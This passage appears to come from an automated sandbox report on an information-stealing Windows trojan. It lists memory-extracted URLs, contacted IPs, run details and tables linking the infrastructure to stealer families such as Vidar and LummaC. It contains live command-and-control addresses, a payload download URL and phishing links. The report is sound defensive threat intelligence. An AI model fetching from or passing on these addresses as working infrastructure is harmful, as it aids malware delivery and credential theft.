https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0	1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/mozglue.dll#	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001167000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2627587707.000000000620C000.00000004.00000020.00020000.00000000.sdmp, CFHCGH.1.dr	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform:Unsu	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/kV	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BFHDAE.1.dr	false	URL Reputation: safe	unknown
https://65.108.151.108/0?Q	MSBuild.exe, 00000006.00000002.2623692581.00000000010A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privacy_agreement/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/F	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/a	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/dp	MSBuild.exe, 00000008.00000002.2274890181.0000000000D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/indows.storage.dlll	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://arpdabl.zapto.org	MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.108.151.108/_F	MSBuild.exe, 00000006.00000002.2623692581.0000000001173000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/p	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision~http://schemas.xmlsoap.o	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	CFHCGH.1.dr	false	URL Reputation: safe	unknown
http://arpdabl.JKEBFHJDBF	MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/about/	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/my/wishlist/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com//	MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	BFHDAE.1.dr	false	URL Reputation: safe	unknown
https://t.me/	MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.mi	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.108.151.108/&	MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/s41l06#goMozilla/5.0	DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	MSBuild.exe, 00000006.00000002.2617277364.000000000044B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/armad2ahellosqls.dllsqlite3.dllIn	1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.108.151.108/sqls.dll=Sq	MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/market/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/steals/gfn1go.exedary=----HIDAKFIJJKJJJKEBKJEHult-release	MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.199.218.33	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
5.75.212.60	unknown	Germany	24940	HETZNER-ASDE	false
172.67.213.85	liernessfornicsa.shop	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
65.108.151.108	unknown	United States	11022	ALABANZA-BALTUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483168
Start date and time:	2024-07-26 18:55:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1lKbb2hF7fYToopfpmEvlyRN.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/33@4/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 111 Number of non-executed functions: 151
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.114.59.183, 199.232.210.172, 192.229.221.95, 13.95.31.18, 40.126.32.140, 40.126.32.138, 40.126.32.136, 40.126.32.74, 20.190.160.22, 20.190.160.14, 40.126.32.68, 20.190.160.20, 13.89.179.12
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 1lKbb2hF7fYToopfpmEvlyRN.exe

Simulations

Behavior and APIs

Time	Type	Description
12:56:12	API Interceptor	8x Sleep call for process: MSBuild.exe modified
12:57:14	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.199.218.33	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	LisectAVT_2403002C_67.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	FusionLoader v2.1.exe	Get hash	malicious	Unknown	Browse
	FusionLoader v2.1.exe	Get hash	malicious	Unknown	Browse
	setup_Github.exe	Get hash	malicious	LummaC Stealer	Browse
	ynZemxI36h.exe	Get hash	malicious	RedLine	Browse
	rqdYnT5Mf1.exe	Get hash	malicious	RedLine	Browse
	UwC67bObmD.exe	Get hash	malicious	RedLine	Browse
	LxBmuILcBR.exe	Get hash	malicious	RedLine	Browse
	ggtFWl8FYQ.exe	Get hash	malicious	RedLine	Browse
5.75.212.60	file.exe	Get hash	malicious	Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
172.67.213.85	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
172.67.213.85	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse
65.108.151.108	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse
65.108.151.108	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
149.154.167.99	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	fps-booster.exe	Get hash	malicious	StormKitty	Browse	149.154.167.99
	LisectAVT_2403002A_138.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002B_344.exe	Get hash	malicious	Bdaejec, Vidar	Browse	149.154.167.99
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_18.exe	Get hash	malicious	Raccoon	Browse	188.114.96.3
	LisectAVT_2403002C_18.exe	Get hash	malicious	Raccoon	Browse	188.114.97.3
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	23.197.127.21
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.192.247.89
	LisectAVT_2403002B_344.exe	Get hash	malicious	Bdaejec, Vidar	Browse	23.207.106.113
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.199.218.33
	LisectAVT_2403002C_67.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.199.218.33
	LisectAVT_2403002C_81.exe	Get hash	malicious	Vidar	Browse	23.197.127.21
	35fcdf3a.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.192.247.89
bg.microsoft.map.fastly.net	https://1drv.ms/b/c/0524e941baea8759/EbTQ6AvSTkdPuFAldWpGokYBh0MxWHPfUcZj1H5z_yZ5Ew?e=cIicc7	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://123formbuilder.info/wj412l/#9ryano@vib.tech	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://rlbjalk.vk.com//away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=lamachado.com.br/dayo/2d5vx/cm9zZWxsYS5hdHRyb3R0b0BhY2NpYWllcmllZGl0YWxpYS5jb20=$%C3%A3%E2%82%AC%E2%80%9A	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://alamanaschool-my.sharepoint.com/:o:/g/personal/faridhajahan_kg_amanaschool_com/EjJ3Pc0GI4lCgL5xS_fmQD0Bn9XR0VtN5_yNafsBQyYJsg?e=OHPWmQ	Get hash	malicious	Unknown	Browse	199.232.214.172
	setup.exe	Get hash	malicious	Neoreklami	Browse	199.232.210.172
	https://mail.feyro.com/d2/xzw/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.congresosucv.com/maindeal/fxc/bWVsaXNzYS53aGl0ZWh1cnN0QGFmZm9yZGFibGVkZW50dXJlcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe	Get hash	malicious	GuLoader, Remcos	Browse	199.232.210.172
	http://desistarsgilrsfunclub.blogspot.com	Get hash	malicious	Unknown	Browse	199.232.210.172
arpdabl.zapto.org	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	77.91.101.71
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	77.91.101.71
	subsoft.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	77.91.101.71
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	77.91.101.71
	MN3OAv98T9.exe	Get hash	malicious	LummaC, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	23.223.209.207
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	184.28.90.27
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	23.45.221.2
	http://dbqfv.albayadir.com/4FaPOJ14156pAYM1149rhihjecjok14462PXXTUVISVBPXZDA18893QSMJ16691Y17	Get hash	malicious	Unknown	Browse	104.122.39.134
	http://qugah.josebricenonunez.com/4bkLgq13767psOP1066qdrtnfgvkk14832GVFEQWKTBRGACUF22091YNZV16689a17	Get hash	malicious	Unknown	Browse	104.122.39.134
	One_Docx 1.pdf	Get hash	malicious	HTMLPhisher	Browse	104.118.8.172
	Fire Safety Partnership.pdf	Get hash	malicious	HTMLPhisher	Browse	2.16.202.123
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	N#U00b0025498563-.pdf	Get hash	malicious	Unknown	Browse	23.43.252.185
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	SystemBC	Browse	147.45.134.52
	LisectAVT_2403002A_140.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	LisectAVT_2403002A_151.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.62
	LisectAVT_2403002A_163.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	LisectAVT_2403002A_185.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	LisectAVT_2403002A_191.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.62
	LisectAVT_2403002A_218.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	LisectAVT_2403002A_228.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	LisectAVT_2403002A_30.exe	Get hash	malicious	Amadey	Browse	193.233.132.56
	LisectAVT_2403002A_33.exe	Get hash	malicious	Amadey	Browse	193.233.132.56
HETZNER-ASDE	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=	Get hash	malicious	HTMLPhisher	Browse	88.99.142.215
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	5.75.212.60
	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	188.40.141.211
	C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe	Get hash	malicious	Bdaejec, BitCoin Miner, Xmrig	Browse	159.69.71.228
	be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe	Get hash	malicious	SmokeLoader	Browse	188.40.141.211
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	188.40.141.211
	Endermanch@MEMZ.exe	Get hash	malicious	Bdaejec, KillMBR	Browse	116.202.167.133
CLOUDFLARENETUS	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	188.114.96.3
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	104.17.25.14
	https://123formbuilder.info/wj412l/#9ryano@vib.tech	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	104.21.72.79
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	172.64.41.3
	https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0	Get hash	malicious	Phisher	Browse	104.21.52.77
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	104.21.10.30
	https://forms.office.com/e/4PVhav2XCG	Get hash	malicious	Unknown	Browse	104.16.117.116

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60 65.108.151.108
	DS_Store.exe	Get hash	malicious	CobaltStrike, ReflectiveLoader	Browse	5.75.212.60 65.108.151.108
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	5.75.212.60 65.108.151.108
	file.exe	Get hash	malicious	Vidar	Browse	5.75.212.60 65.108.151.108
	yINa8PjdSm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
	DDPciclShm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
	uUW3k0UzfV.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
	yINa8PjdSm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
	DDPciclShm.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
	uUW3k0UzfV.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	5.75.212.60 65.108.151.108
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	172.67.213.85
	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	172.67.213.85
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	172.67.213.85
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	172.67.213.85
	DS_Store.exe	Get hash	malicious	CobaltStrike, ReflectiveLoader	Browse	172.67.213.85
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	172.67.213.85
	file.exe	Get hash	malicious	Unknown	Browse	172.67.213.85
	file.exe	Get hash	malicious	Unknown	Browse	172.67.213.85
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	172.67.213.85
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	172.67.213.85
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	23.199.218.33 149.154.167.99
